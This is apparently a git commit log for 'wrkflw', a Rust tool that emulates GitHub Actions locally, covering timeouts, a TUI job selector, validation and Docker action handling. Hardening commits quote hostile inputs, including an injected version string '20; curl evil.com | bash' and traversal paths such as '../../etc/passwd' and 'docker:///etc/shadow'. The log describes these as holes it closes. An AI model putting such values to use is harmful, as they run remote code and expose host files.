execute_matrix_job had *no* timeout enforcement whatsoever. The
regular execute_job path got the per-step deadline treatment in
5792154, but matrix jobs were left behind with a bare .await? that
would happily run until the heat death of the universe.

Apply the same sanitize_timeout_minutes / job_deadline /
saturating_duration_since pattern so matrix jobs get identical
timeout behavior.

While at it, consolidate the duplicate std::env::current_dir()
calls in emulation.rs into a single variable, and clarify the
is_valid_identifier doc comment to explain it validates GHA env
file keys (not step IDs, which allow hyphens).
2026-04-02 23:41:36 +05:30
Gokul
6016887a3b feat(executor): easy GHA emulation fixes for better compatibility (#82)
* feat(executor): add easy GHA emulation fixes for better compatibility

- Expand github.* context with 13 missing env vars (CI, GITHUB_ACTIONS,
  GITHUB_REF_NAME, GITHUB_REF_TYPE, GITHUB_REPOSITORY_OWNER, etc.) and
  improve GITHUB_ACTOR to use git config / $USER instead of hardcoded value
- Enforce timeout-minutes at both job level (default 360m per GHA spec)
  and step level via tokio::time::timeout
- Implement defaults.run.shell and defaults.run.working-directory with
  proper fallback chain: step > job defaults > workflow defaults > bash
- Implement hashFiles() expression function with glob matching, sorted
  file hashing (SHA-256), and integration into the substitution pipeline

* fix(executor): harden hashFiles, working-directory, and shell -e

Three issues from code review, all in the "we got the GHA emulation
*almost* right" category:

1. hashFiles() was returning an empty string when no files matched.
   GHA returns the SHA-256 of empty input (e3b0c44...), not nothing.
   An empty string as a cache key component is the kind of thing
   that silently ruins your day. Also, unreadable files were being
   skipped without a peep — now we at least warn about it.

2. The working-directory default resolution was doing a naive
   Path::join with user-controlled input. If someone writes
   `working-directory: ../../../etc` or an absolute path, join
   happily replaces the base. Inside a container this is *somewhat*
   contained, but in emulation mode it's a real path traversal.
   Normalize the path and reject anything that escapes the
   workspace.

3. The bash -e flag change (correct per GHA spec) was undocumented.
   Scripts that relied on intermediate commands failing without
   aborting the step will now break. Document it in
   BREAKING_CHANGES.md so users aren't left guessing.

* fix(executor): complete the GHA shell invocation and harden hashFiles

The previous commit added `-e` to bash but stopped there, even
though the BREAKING_CHANGES.md *literally documented* the full GHA
invocation as `bash --noprofile --norc -e -o pipefail {0}`. So we
were advertising behavior we weren't actually implementing. This is
not great.

Without `-o pipefail`, piped commands like `false | echo ok` would
silently succeed, which is exactly the kind of divergence that makes
you distrust an emulator. And without `--noprofile --norc`, user
profile scripts can interfere with reproducibility.

While at it, fix hashFiles error handling — it was silently
swallowing read errors and producing a partial hash, which is worse
than failing because you get a *wrong* cache key with no indication
anything went sideways. preprocess_hash_files and
preprocess_expressions now return Result and the engine surfaces
failures as step errors.

Also add the tests that should have been there from the start:
shell invocation flags, working-directory path traversal rejection,
and defaults cascade (step > job > workflow).

* fix(executor): harden hashFiles, timeout, and shell edge cases

The previous round of GHA emulation fixes left a few holes that
would bite you in production:

hashFiles() would happily glob '../../etc/passwd' and hash whatever
it found outside the workspace. It also loaded entire file contents
into memory before hashing, which is *not great* when someone points
it at a large binary artifact. The glob patterns now reject '..'
traversal, and file contents are streamed into the SHA-256 hasher
via io::copy instead.

timeout-minutes accepted any f64 from YAML, including negative
values, NaN, and infinity — all of which make Duration::from_secs_f64
panic. Non-finite and non-positive values now fall back to the GHA
default of 360 minutes.

Unknown shell values were silently accepted with a '-c' fallback.
Now they emit a warning so you at least *know* something is off.

While at it, replaced the hash_files_read_error_returns_err test
that was testing two Ok paths (despite its name) with proper
path-traversal rejection tests.

* fix(executor): fix shadowed timeout_mins and extract sanitization helper

It turns out the job timeout error path was re-reading the *raw*
timeout_minutes value instead of using the already-sanitized one.
If someone set timeout-minutes to NaN or a negative number, the
sanitization would correctly fall back to 360, but the error
message would happily print "Job exceeded timeout of NaN minutes."

Not great.

Extract sanitize_timeout_minutes() so both the job and step
timeout paths use the same logic instead of duplicating the
is_finite/positive/clamp dance. While at it, add proper tests
for NaN, Infinity, negative, zero, and the max clamp — plus a
test that actually exercises the job-level timeout expiry branch,
which previously had zero coverage.
2026-04-02 18:00:41 +05:30
Gokul
14d30b6b57 feat(ui): add job selection mode to TUI for running individual jobs (#80)
* feat(ui): add job selection mode to TUI for running individual jobs

The CLI already has --job to run a single job, but the TUI had no
way to do this. You could only run entire workflows, which is the
kind of all-or-nothing approach that gets old fast when you have a
workflow with 12 jobs and you just want to re-run "lint".

Add a job selection sub-view to the Workflows tab. Press Enter on a
workflow to drill into its jobs (parsed via parse_workflow), then
Enter on a job to run just that one (with its transitive deps), or
'a' to run all, or Esc to go back. The selected job flows through
as target_job in ExecutionConfig, reusing the exact same filtering
logic the CLI --job flag already uses.

While at it, updated the status bar hints and help overlay to
document the new keybindings.

* fix(ui): stop target_job from leaking across queued workflows

The job selection feature added in 8406c60 stored target_job as a
single global field on App, shared across all queued executions.
It turns out that when you use a global mutable field as a
communication channel between "user picked a job" and "executor
should run this job", *any* workflow queued after the first one
silently inherits whatever target_job was set. Confusion ensues.

While at it, the Enter key was repurposed from "run this workflow"
to "enter job selection mode", which means the most common operation
now takes two keypresses instead of one. That's not great.

Also, pressing 'r' during job selection mode would bypass it
entirely and start execution with target_job still set from the
previous selection, leaving the UI in a corrupt state. Please don't
ship unguarded key handlers in modal UIs.

The fix:

- Replace the global target_job with a per-entry QueuedExecution
  struct that carries its own target_job. Each queued workflow now
  owns its execution config. No more ambient mutable state.

- Cache parsed job names in Workflow at discovery time instead of
  re-parsing the YAML file on every Enter keypress.

- Restore Enter to its original "run the workflow" behavior. Job
  selection is now Shift+J, which doesn't steal the primary action
  key.

- Guard 'r' and other keys properly in job_selection_mode.

- Deduplicate select_job_and_run/run_all_jobs into a single
  run_from_job_selection(target: Option<String>) method.

* fix(ui): fix job selection bugs and add tests

The single-file CLI path (`wrkflw --tui <file>`) was hardcoding
job_names to Vec::new(), which means Shift+J would always report
"No jobs found" even when the workflow *obviously* has jobs. Not
great when the whole point of this feature is selecting jobs.

The dedup logic in run_from_job_selection() was checking
workflow_idx equality only, so queueing the same workflow with
different target jobs (run "build", then run "test") would silently
drop the second one. The user clicks a thing, nothing happens.
Confusion ensues.

While at it, extract the job name parsing into a shared
extract_job_names() helper — the same six lines were copy-pasted
in three places, which is exactly how you end up with three
slightly different bugs later.

Add 12 unit tests covering the job selection state machine:
enter/exit mode, navigation wrapping, target_job threading through
the execution queue, and the dedup fix.

* fix(ui): deduplicate job selection cleanup and add edge case tests

run_from_job_selection was manually inlining the same three lines
that exit_job_selection_mode already does. That's the kind of thing
that *will* drift the moment someone adds cleanup logic to one path
but not the other. Let's just call the existing method.

While at it, add tests for two untested edge cases: calling
run_from_job_selection when no workflow is selected (should be a
safe no-op), and entering job selection mode with an out-of-bounds
index (should also be a no-op). Also document the precondition that
callers must check !self.running before calling run_from_job_selection.
2026-04-02 15:38:58 +05:30
Gokul
f05cbca3b9 feat(ui): make TUI optional behind a cargo feature flag (#79)
* feat(ui): make TUI optional behind a cargo feature flag

The TUI is great for interactive use, but if you want to run wrkflw
as a headless CI runner, dragging in ratatui and crossterm is
pointless baggage. Issue #41 asked for this, and honestly the code
was already well-isolated enough that it *should* have been optional
from the start.

Add a `tui` feature flag (default-on) to both the `wrkflw-ui` crate
and the main binary crate. When disabled via `--no-default-features`,
ratatui/crossterm are gone, the `tui` subcommand disappears, and
running with no args prints help instead of launching the TUI. All
CLI subcommands (validate, run, trigger, list) remain fully
functional.

While at it, removed the direct crossterm/ratatui deps from the
binary crate — it never imported them, they were just coming through
transitively anyway.

* refactor(ui): feature-gate models and utils, clean up cfg imports

The previous commit gated the TUI behind a feature flag but left the
models and utils modules unconditionally compiled. It turns out that
*every single consumer* of those modules is TUI-gated code — they
were compiling to dead code when building with --no-default-features.

Gate models and utils behind cfg(feature = "tui") where they belong.
While at it, consolidate the five separate #[cfg(feature = "tui")]
annotations on imports in workflow.rs into a single grouped use block,
because repeating the same attribute five times in a row is not my
idea of readability.

Also add a cargo check --no-default-features step to CI so this
kind of thing doesn't silently regress.

* ci(build): drop archived actions-rs/cargo, add --workspace to feature check

The actions-rs/cargo@v1 action has been archived for a while now,
and wrapping every cargo invocation in a GitHub Action that just...
calls cargo... was never exactly adding value. Replace all five
uses with plain `run: cargo <cmd>` steps.

While at it, add --workspace to the --no-default-features check so
it actually verifies *all* crates compile without the tui feature,
not just the default workspace member. The previous version would
happily miss breakage in any non-default crate.
2026-04-02 14:51:59 +05:30
Gokul
ebabe6414a feat(validate): cross-check local composite action required inputs (#78)
* feat(validate): cross-check local composite action required inputs

The validate command was happily declaring workflows "valid" even
when they used a local composite action without providing its
required inputs. The workflow would then blow up at runtime, which
is *exactly* the kind of thing a validator should catch.

The problem was that validate_action_reference() only checked
whether the local action path existed on disk. It never bothered
to read the action.yml, look at the inputs section, or verify
that required inputs were actually provided in the step's `with:`
block. So it was doing about half its job.

Thread the repo root path through the validator call chain
(evaluate_workflow_file → validate_jobs → validate_steps →
validate_action_reference) so we can resolve local action paths.
Then read and parse the action.yml, extract inputs with
`required: true` and no default, and flag any that are missing
from the step's `with:` params. Case-insensitive matching because
that's what GitHub Actions does.

Graceful degradation: if we can't find the repo root or the
action file is unreadable, we silently skip rather than blowing
up. 10 new unit tests cover the various cases.

Closes #67

* fix(validate): handle string `required` and drop unsafe cwd fallback

Two bugs in the local action input validation that just landed:

First, `find_repo_root` was falling back to `current_dir()` when no
`.git` directory was found. This is *wrong* — if you're validating a
workflow outside a git repo, the cwd could be literally anywhere, and
you'd end up resolving local action paths against some random
directory. Return `None` and skip the check instead.

Second, `required: 'true'` (as a YAML string) was silently treated as
not required, because we only checked `as_bool()`. GitHub Actions
treats the string "true" as truthy, so we should too. Add
case-insensitive string matching alongside the bool check.

While at it, add a test for the string `required` case so we don't
regress on this.
2026-04-02 13:49:47 +05:30
Gokul
452044f9d2 feat(cli): add --job flag to run a specific job and --jobs to list them (#77)
* feat(cli): add --job flag to run a specific job and --jobs to list them

Until now, wrkflw only operated at the workflow level. You could
run an entire workflow or list workflow files, but if you wanted to
debug a single failing job you had to sit through every other job
first. This is not great.

Add `--job <name>` to `wrkflw run` so you can execute exactly one
job in isolation, skipping dependency resolution entirely. Add
`--jobs` to `wrkflw list` so you can actually *see* what jobs are
available before running them. Both work for GitHub workflows and
GitLab pipelines.

The filtering happens after dependency resolution — we just replace
the execution plan with a single-job batch. If the job name doesn't
exist, we tell you what's available instead of silently doing
nothing. The TUI still runs full workflows; job selection there is
a separate concern.

Closes #68

* fix(executor): include transitive deps when running a single job

The --job flag was replacing the entire execution plan with just the
target job, silently dropping all its dependencies. So if you ran
--job deploy and deploy needs build which needs setup, you'd get
deploy running alone with none of its prerequisites. Confusion ensues.

Extract the duplicated inline filtering (copy-pasted verbatim across
both the GitHub and GitLab execution paths) into a shared
filter_plan_to_job() helper in dependency.rs. The new logic walks
the needs graph via BFS to collect transitive deps, then prunes the
existing topologically-sorted plan to only include relevant jobs
while preserving batch ordering.

Add 9 unit tests covering the dependency collection and plan
filtering — linear chains, diamond graphs, partial subgraph
isolation, error paths, and empty batch removal.

* fix(executor): use stage-aware filtering for GitLab --job flag

It turns out that filter_plan_to_job walks `needs` edges to find
transitive dependencies, which works fine for GitHub workflows. But
GitLab pipelines use *stage ordering* for implicit dependencies, and
convert_to_workflow_format sets `needs: None` on every converted
job. So running `--job deploy` on a GitLab pipeline would silently
drop all build and test jobs. Not great.

Add filter_plan_to_job_by_stage that understands the GitLab model:
keep all jobs in earlier stage batches (they're implicit deps) and
filter only the target's own batch down to just the target job.
The GitHub workflow path continues using the needs-based filter.

While at it, extract the job-not-found error into a shared helper
and add proper test coverage: 6 unit tests for the stage-aware
filter plus 3 integration tests exercising the full execute_workflow
path with target_job set.
2026-04-02 13:22:58 +05:30
Gokul
781bd42b21 fix(docker): persist setup action images across job steps (#76)
* fix(docker): persist setup action images across job steps

Reported in #60. When a workflow uses actions like setup-node or
setup-php, the Docker image resolved for that action (e.g.
node:20-slim, composer:latest) was only used for the action step
itself. Every subsequent `run:` step would blissfully fall back to
ubuntu:latest, which of course has neither node nor composer.

Confusion ensues.

It turns out that `execute_job()` computes `runner_image_value`
exactly *once* via `get_effective_runner_image()` and never updates
it. The action step gets its own image from `prepare_action()`, but
that image is completely ignored for subsequent `run:` steps. So
your setup-node configures... nothing, as far as run steps care.

Fix this by pre-scanning all job steps for known setup actions
before the step loop begins. Single setup action? Use its image.
Multiple setup actions (e.g. Laravel's PHP + Node.js combo)? Build
a combined Dockerfile that installs all required runtimes on the
ubuntu base. No setup actions? Nothing changes — fully backward
compatible.

While at it, skip the pointless pull attempt for locally-built
wrkflw-* images (they only exist locally, the 404 from Docker Hub
was just noise), and bump the build_image timeout from 2 minutes
to 10 — because installing PHP from a PPA inside a Docker build
is not a speed demon.

Closes #60

* fix(docker): harden setup action runtime detection against injection and waste

The setup action detection code was interpolating user-controlled
version strings straight into Dockerfile RUN directives with zero
validation. So a workflow with node-version: "20; curl evil.com |
bash" would happily inject arbitrary commands into the build. This
is not great.

It also used starts_with() for action name matching, which would
match actions/setup-node-legacy or anything else that happened to
share the prefix. And every single build generated a UUID-tagged
image that was never cleaned up, so you'd accumulate orphaned
wrkflw-combined:* images until your disk had opinions about it.

While at it, the 2-minute to 10-minute timeout bump was applied to
*all* image builds, not just the combined runtime ones that actually
need it. And the Go install script hardcoded linux-amd64, which is
the kind of thing that works right up until someone runs on ARM.

Let's fix all of it:

- Validate version strings against [a-zA-Z0-9._-] before use
- Use exact equality for action repo matching, not prefix matching
- Use deterministic content-based image tags so identical runtime
  combinations reuse cached images
- Deduplicate same-language setup steps (last one wins)
- Scope the 10-minute timeout to wrkflw-combined:* builds only
- Detect container architecture for Go installs
- Add tests for all of the above

* fix(docker): fix three correctness bugs in setup action image resolution

The previous commit introduced setup action detection, but it had
a few problems that would bite people in practice.

First, the single-runtime path was returning bare images like
node:20-slim or python:3.12-slim directly. These images don't have
git installed, which means actions/checkout — typically the *first*
step in any workflow — would just fail. Not great.

Fix: always build a combined image on top of the runner base
(catthehacker/ubuntu:act-latest) even for single-runtime jobs, so
git and friends remain available. The SetupRuntime.image field is
now dead code, so remove it entirely.

Second, the Python install script was cheerfully ignoring the
requested version and installing whatever python3 the distro ships.
Ask for 3.12, get 3.10. Surprise. Fix: use the deadsnakes PPA to
install the specific version requested.

Third, PodmanRuntime had no skip-pull guard for locally-built
wrkflw-* images, so podman would attempt to pull wrkflw-combined:*
from a registry. Add --pull=never for wrkflw-* prefixed images.

* refactor(docker): unify setup action registry and fix remaining review issues

The previous commits introduced setup action detection, but left a
few things in a state that would annoy anyone who looked closely.

First, determine_action_image() was still using starts_with() for
action matching — the exact same bug that detect_setup_runtimes had
already fixed. So "actions/setup-node-legacy" would happily match
as a Node.js setup action. Not great.

Second, dtolnay/rust-toolchain conventionally encodes the toolchain
in the @ref (e.g., @nightly, @1.75.0), not in a with.toolchain key.
The old code would silently default to "stable" for anyone using the
idiomatic form. Surprise.

Third, the repetitive if/else chain in detect_setup_runtimes (seven
near-identical blocks) and the parallel match in determine_action_image
were two independent copies of the same knowledge, with no compile-time
guarantee they'd stay in sync. Adding a new setup action meant editing
two places and hoping you remembered both.

Fix all of it:

- Introduce a single SETUP_ACTIONS const table that both functions
  consume, eliminating the drift risk entirely
- Add version_from_ref support so dtolnay/rust-toolchain@nightly
  actually produces "nightly" instead of "stable"
- Extract generate_combined_dockerfile() and combined_image_tag() as
  pure testable functions
- Merge all install scripts into a single RUN layer instead of N
  separate apt-get update calls
- Include a content hash in image tags so install script changes
  invalidate cached images even when language/version pairs are the
  same
- Add 15 tests covering all the above

* fix(docker): add image caching, stable hashing, and shared constants

The combined runtime image code had three problems that were all
independently annoying but together made for a lovely trifecta of
"why is this slow and also fragile."

First, build_combined_runtime_image was *always* rebuilding the
Docker image, even when a perfectly good one already existed
locally. That means every single job run was creating temp dirs,
writing Dockerfiles, tarring contexts, and shipping them to the
daemon. For absolutely no reason.

Second, the image tag hash used DefaultHasher, which Rust's own
docs explicitly say is not stable across versions. So upgrading
your Rust toolchain silently invalidates every cached image. Not
great when caching is the whole point.

Third, the "wrkflw-" and "wrkflw-combined:" prefixes were
hardcoded as magic strings in three separate files. Change one,
forget the others, and you get to debug why podman is trying to
pull a locally-built image from Docker Hub.

The fix: add image_exists() to ContainerRuntime so we can skip
redundant builds, replace DefaultHasher with FNV-1a for stable
cross-version hashing, and extract the prefixes into shared
constants. While at it, merge the duplicate apt-get update calls
in the generated Dockerfile into a single RUN layer.

* fix(docker): fix version_from_ref with SHA pins and normalize .x suffixes

The version_from_ref logic for dtolnay/rust-toolchain was happily
treating a pinned git SHA (the 40-char hex kind) as a toolchain
name. So `dtolnay/rust-toolchain@d4ff7a3c5...` would try to
install Rust toolchain "d4ff7a3c5...", which rustup finds *deeply*
confusing. Filter out bare SHAs with the existing is_git_sha()
check and fall back to the default version instead.

While at it, the ".x" suffix that's idiomatic for Node versions
(e.g., "16.x") was leaking through to install scripts for every
language. Python would try to apt-get install python16.x, which
is not a real package and never will be. Normalize the suffix away
at extraction time rather than making each install script deal
with it independently.

Add tests for both cases.
2026-04-02 12:34:40 +05:30
Gokul
fd348a460e fix: actually execute Docker-based GitHub Actions instead of emulating them (#74)
* fix(executor): actually execute Docker-based GitHub Actions instead of emulating them

Third-party GitHub Actions that use Docker (like super-linter) were
silently passing without ever *actually running*. The engine would
resolve the action, pick a Docker image, and then... run
`echo 'Would execute GitHub action: ...'` inside it. Every single
time. Regardless of runtime mode. Confusion ensues.

It turns out there were two separate failures conspiring here:

1. `prepare_action()` would error out on `ActionType::DockerBuild`
   with "not yet supported", fall back to `determine_action_image()`,
   and cheerfully return `node:20-slim` for super-linter. This is
   not great.

2. The `PreparedAction::Image` execution branch had three sub-paths
   for is_docker, is_local, and everything else — and *all three*
   just ran echo commands. The image was resolved correctly and then
   completely ignored.

The fix has several parts:

- Add a `NativeDocker` variant to `PreparedAction` that means "run
  this image with its built-in ENTRYPOINT, no command override."
  Docker registry actions and DockerBuild actions both use this.

- Implement DockerBuild properly: clone the repo, resolve the
  Dockerfile path from action.yml, build it, return the tag.
  Uses the existing `shallow_clone` and `runtime.build_image`.

- Fix `build_image_inner` to tar the *full context directory*
  instead of just the Dockerfile. The old code had `_context_dir`
  sitting right there, computed and unused. COPY instructions in
  Dockerfiles need the context, obviously.

- Allow empty `cmd` in `run_container` to mean "use the image's
  default ENTRYPOINT/CMD". The Docker impl now sets `config.cmd =
  None` when cmd is empty. Podman already handled this correctly.

The existing `PreparedAction::Image` path with all its special-cased
action handling (actions-rs, checkout, etc.) is completely untouched.

Closes #59

* fix(executor): fix macOS entrypoint hang, path traversal, and silent emulation pass

Three bugs in the Docker action execution path from the previous
commit:

1. The macOS emulation entrypoint override (`bash -l -c`) was applied
*unconditionally*, even when cmd was empty (NativeDocker path). That
means Docker actions running on macOS emu images would get bash with
no argument — which either hangs forever or exits immediately. The
image's real ENTRYPOINT gets discarded either way. This is not great.

Fix: capture `has_cmd` before cmd_vec is moved into the config, only
apply the bash wrapper when there's actually a command to wrap.

2. The `dockerfile_rel` extracted from action.yml's `runs.image` was
not sanitized after stripping the `docker://` prefix. A malicious
action.yml with `docker:///etc/shadow` or `../../sensitive` would
escape the action directory via Path::join's absolute-path behavior
or dotdot traversal.

Fix: strip leading slashes and reject any path containing `..`.

3. Emulation mode returned exit_code 0 for Docker actions it *didn't
actually run*. Users got a green checkmark for actions that were
silently skipped. Confusion ensues.

Fix: return exit_code 1 with a clear stderr message explaining the
action was not executed and needs --runtime docker.

While at it, add tests for all three fixes: NativeDocker variant
construction, dockerfile path sanitization (6 cases), and emulation
empty-cmd failure behavior.

* fix(executor): harden Docker action security and fix docker:// execution path

Three issues found during review, all in the Docker action plumbing:

1. The `is_docker` path in `prepare_action()` was returning
`PreparedAction::Image` instead of `NativeDocker`, which means
`docker://` prefixed actions in `uses:` went straight through the
legacy echo-command path and *never actually executed*. Same class
of bug we just fixed for DockerBuild, hiding in plain sight.

2. The path traversal check for Dockerfile paths used
`contains("..")`, which rejects perfectly legitimate directory
names like `foo..bar/`. Check for `..` as an actual path
*component* instead via `split('/').any(|c| c == "..")`.

3. `build_image_inner` was calling `append_dir_all` on untrusted
action repositories without disabling symlink following. A
malicious action repo could plant a symlink pointing at the host
filesystem and have its contents shipped into the Docker build
context. That's the kind of thing that makes security auditors
lose sleep. Set `follow_symlinks(false)` on the tar builder.

* fix(executor): wire up runs.entrypoint, runs.args, and fix local Docker dispatch

The previous commits got the NativeDocker path working for remote
actions, but left several holes that a code review correctly
identified. Let's fix them all.

First, local Docker actions (uses: ./my-action with a Dockerfile)
were *still* returning PreparedAction::Image instead of NativeDocker.
Same class of bug we just fixed for remote actions, hiding one
function call away. They now go through NativeDocker and parse the
local action.yml for entrypoint/args.

Second, runs.entrypoint and runs.args from action.yml were being
completely ignored. Docker actions that declare their entrypoint in
action.yml (which is, you know, *a lot of them*) would silently
use the wrong entrypoint. Add an entrypoint parameter to the
ContainerRuntime trait and thread it through all four implementations:
Docker sets Config.entrypoint, Podman passes --entrypoint, and the
emulation runtimes accept-and-ignore it.

Third, with.args from workflow steps (uses: docker://alpine with
args: "echo hello") was not being passed as container CMD. It now
overrides runs.args when present, matching GitHub Actions behavior.

While at it:
- Extract sanitize_dockerfile_rel into a real function instead of
  having the tests duplicate the logic and test their own copy.
  Testing a copy of your code instead of the actual code is not
  what I'd call confidence-inspiring.
- Add canonicalize() defense-in-depth after Dockerfile path
  resolution to catch symlink escapes.
- Document the build_image_inner context directory invariant.

* fix(executor): fix broken args parsing, empty dockerfile path, and silent entrypoint drop

Three correctness bugs found during review of the Docker action
execution path:

1. with.args was being split on whitespace like a caveman. An
   argument like "hello world" would turn into two separate args,
   which is *not* how GitHub Actions works. Use shlex::split() for
   proper shell-word parsing, with a whitespace fallback for
   malformed input that shlex chokes on.

2. sanitize_dockerfile_rel() happily accepted empty strings. Feed
   it "" or "docker://" and it would produce an empty path, which
   then joins to a directory instead of a file. The subsequent
   docker build would fail with a confusing error. Let's just
   reject empty paths upfront.

3. SecureEmulationRuntime silently swallowed the entrypoint
   override without telling anyone. If you're running in secure
   emulation mode and your action specifies runs.entrypoint, you
   deserve to know it's being ignored — not left wondering why
   your action isn't doing what you expect.

* fix(executor)!: pass explicit build context to Docker image builds

It turns out that build_image_inner was deriving the Docker build
context from dockerfile.parent(), which is *wrong* when the
Dockerfile lives in a subdirectory of the action root. An action
with runs.image: subdir/Dockerfile would get subdir/ as its build
context instead of the action root, silently breaking every COPY
instruction that references files outside that subdirectory.

The fix is straightforward: add an explicit context_dir parameter
to the ContainerRuntime::build_image trait so callers tell us what
the context is instead of us guessing from the Dockerfile path.
The DockerBuild path in engine.rs now passes &action_dir, and the
Docker inner implementation computes the Dockerfile path relative
to context_dir via strip_prefix instead of just using file_name().

While at it, add a warning log when shlex::split fails to parse
with.args (unmatched quotes). Previously this silently fell back
to naive whitespace splitting, which is the kind of thing that
makes you stare at container logs for an hour wondering why your
quoted argument got split into three pieces.

* fix(executor): reject bad dockerfile paths instead of silently guessing

Three bugs found during review:

The build_image_inner strip_prefix fallback was *silently* using just
the filename when the Dockerfile wasn't a clean descendant of the
context directory. So if something weird happened with the path,
you'd just get the wrong Dockerfile used for the build with zero
indication anything went wrong. That's not a fallback, that's a
footgun. Return an error instead.

sanitize_dockerfile_rel was happily preserving a leading "./" from
the raw path, which then caused strip_prefix to fail (because
"./build/Dockerfile" is not a prefix-match for a joined path).
Strip it early so the downstream path arithmetic actually works.

While at it, extract_docker_runs_config was using filter_map on
runs.args, which means non-string YAML values like integers and
booleans were silently dropped. GitHub Actions coerces those to
strings, so we should too.

* fix(executor): handle string-form args and reject malformed with.args

It turns out that extract_docker_runs_config only handled runs.args
as a YAML sequence. If an action.yml declared args as a plain string
(which GitHub Actions absolutely allows), we'd silently drop the
entire argument. Not great.

While at it, the with.args parser had the opposite problem — when
shlex::split hit an unmatched quote, it shrugged and fell back to
naive whitespace splitting. That's the kind of "graceful degradation"
that produces subtly wrong container invocations and makes you spend
an afternoon wondering why your action is getting the wrong flags.

Fix both: extract_docker_runs_config now handles args as either a
YAML sequence or a string (shell-tokenized via shlex). The with.args
path now returns a hard error on malformed quoting instead of
pretending everything is fine. Added tests for string-form args
including the bad-quoting edge case.

* fix(executor): close sub_path traversal hole and make args parsing consistent

It turns out that sub_path from action references (the part after
owner/repo in owner/repo/some/subdir) was being joined to the clone
directory with absolutely no sanitization. A crafted sub_path like
"../../etc" would escape the cloned repo and get passed as the
Docker *build context*. Please don't do that.

Add sanitize_sub_path() that rejects any path component equal to
"..", and apply it in both the DockerBuild and Composite action
paths. For DockerBuild, also canonicalize the resolved action_dir
and verify it's still inside the repo_dir — because symlinks exist
and trusting user-controlled paths is how we end up on HN.

While at it, fix a behavioral inconsistency in args parsing: bad
quoting in action.yml's runs.args was silently falling back to the
raw string, while the exact same bad quoting in a workflow's
with.args was a hard error. Now both are errors, because silently
doing the wrong thing is worse than loudly refusing.

* fix(executor): harden Docker build context, sanitize inputs, deduplicate mount setup

The PR review flagged several issues ranging from correctness to
performance to plain old code smell. Let's address them all.

It turns out that build_image_inner was happily tarring the *entire*
context directory and shipping it to the Docker daemon, cheerfully
ignoring any .dockerignore file. For large action repos with test
fixtures, docs, and who knows what else, this is not great. When a
.dockerignore exists, we now use the `ignore` crate's WalkBuilder to
walk only non-ignored files. Falls back to the old append_dir_all
when there's no .dockerignore, because we're not breaking anything
that already works.

The sanitize_sub_path and sanitize_dockerfile_rel functions checked
for ".." traversal but not null bytes, which can cause truncation at
OS boundaries and potentially bypass the traversal check. Please
don't do that. Added null byte rejection to both.

extract_docker_runs_config was taking &Option<T> instead of
Option<&T>, which is the Rust equivalent of wearing your shirt
inside out — it works, but everyone who sees it knows something is
wrong. Fixed the signature and all callers.

The with.args empty-string handling was also wrong: `with.args: ""`
was treated as "no override" instead of "pass zero args", which
doesn't match GitHub Actions behavior where the presence of the key
is the signal, not its value.

While at it, extracted the volume/env/mount setup boilerplate that
was copy-pasted across three execution paths into a
StepContainerContext helper. Not because I enjoy moving code around,
but because the same 12 lines in three places is not my idea of
maintainability.

* fix(executor): cap build context size, disable git hooks, add NativeDocker tests

Three security and reliability fixes from the PR review:

The build_image_inner tar buffer was completely unbounded — a
malicious or just absurdly large action repo with no .dockerignore
would happily try to load the entire thing into memory. Now we
track cumulative file sizes and bail at 500 MB. The old
append_dir_all fallback had to go since it gives us no per-file
hook; replaced it with an ignore::WalkBuilder walk (already a dep)
so both paths enforce the same limit.

shallow_clone was happily running git checkout on untrusted repos
without disabling hooks. A cloned repo's .git/hooks/post-checkout
runs automatically, which is the kind of thing that makes security
reviewers lose sleep. Pass -c core.hooksPath=/dev/null to every
git invocation so cloned repos can't execute anything on our host.

While at it, add a MockContainerRuntime and four integration tests
that exercise the NativeDocker execute_step path end-to-end:
entrypoint passthrough, with.args override + INPUT_* injection,
empty args, and step/job env propagation. This path previously had
zero test coverage for the runtime flow.

* fix(executor): deduplicate build context walker, harden sub_path, add missing tests

The build_image_inner code in docker.rs had two near-identical
~50-line walker loops — one for when .dockerignore exists and one
for when it doesn't. The *only* difference was a single
add_custom_ignore_filename() call on the builder. Copy-paste like
that drifts. Let's not.

Merged into a single loop with a conditional on the WalkBuilder
before iteration. Same behavior, half the code.

While at it, sanitize_sub_path now splits on both '/' and '\' so
a Windows-style traversal like "a\..\..\etc" doesn't sneak past
the check. Also expanded the PreparedAction::Image doc comment to
explain which code paths still produce it and why it's distinct
from NativeDocker — future contributors shouldn't have to guess.

Added tests for: unmatched-quote error path in with.args, with.args
overriding runs.args, and backslash path traversal in sub_path.

* fix(executor): close backslash traversal gap and add with.entrypoint override

It turns out that sanitize_dockerfile_rel was only splitting on '/'
to catch ".." traversal, while its sibling sanitize_sub_path was
correctly splitting on both '/' and '\\'. So a crafted Dockerfile
path like "..\\..\\etc\\shadow" would sail right past the
sanitizer.

The canonicalize() defense-in-depth below *would* catch this in
practice, but relying on one security layer to cover a hole in
another is not great. Let's just make them consistent.

While at it, the NativeDocker execution path was missing support
for with.entrypoint — a documented GitHub Actions feature that
lets workflow steps override the Docker container's ENTRYPOINT.
We were already handling with.args but silently ignoring
with.entrypoint, which is the kind of asymmetry that bites you
the moment someone actually tries to use it.

* fix(executor): close composite sub_path symlink hole and filter empty entrypoint

The DockerBuild handler had a proper canonicalize + starts_with
defense-in-depth check after resolving sub_path, but the composite
action handler just blindly trusted sanitize_sub_path() and called
repo_dir.join(p) without verifying the result stayed inside the
cloned repo. A symlink named "legit" pointing to "../../secrets"
would sail right through the string-only sanitizer.

That is not great.

Add the same canonicalize + starts_with check to the composite
action path so both handlers have identical protection.

While at it, filter empty-string entrypoint values to None in both
extract_docker_runs_config and the Docker runtime layer. An empty
runs.entrypoint in action.yml should mean "use the image default",
not "tell Docker to clear the entrypoint" — which is what passing
Some("") actually does. Added tests for both the with.entrypoint
override path and the empty entrypoint filtering.

* fix(executor): filter empty podman entrypoint and extract NativeDocker step handler

The podman runtime was happily passing `--entrypoint ""` to podman
when a workflow set `with.entrypoint: ""`, while Docker correctly
filtered it out via `.filter(|s| !s.is_empty())`. So the two
runtimes silently diverged on empty entrypoint behavior. Not great.

Add the same filter to podman's entrypoint handling so both
runtimes treat empty strings as "use the image default."

While at it, extract the ~90-line NativeDocker match arm from
execute_step into its own `execute_native_docker_step` function.
That match block was getting unwieldy, and this keeps each action
type's execution logic self-contained.

Also drop a TODO on the in-memory tar buffer in build_image_inner —
it holds the entire build context in a Vec<u8>, which gets
uncomfortable as repos approach the 500 MB cap.
2026-04-02 10:28:37 +05:30
Gokul
8a8d7e5eec fix: resolve correctness, security, and parsing bugs across codebase (#73)
* fix: resolve 10 bugs found during full codebase review

- Fix memory leak from Box::leak() in status bar render loop
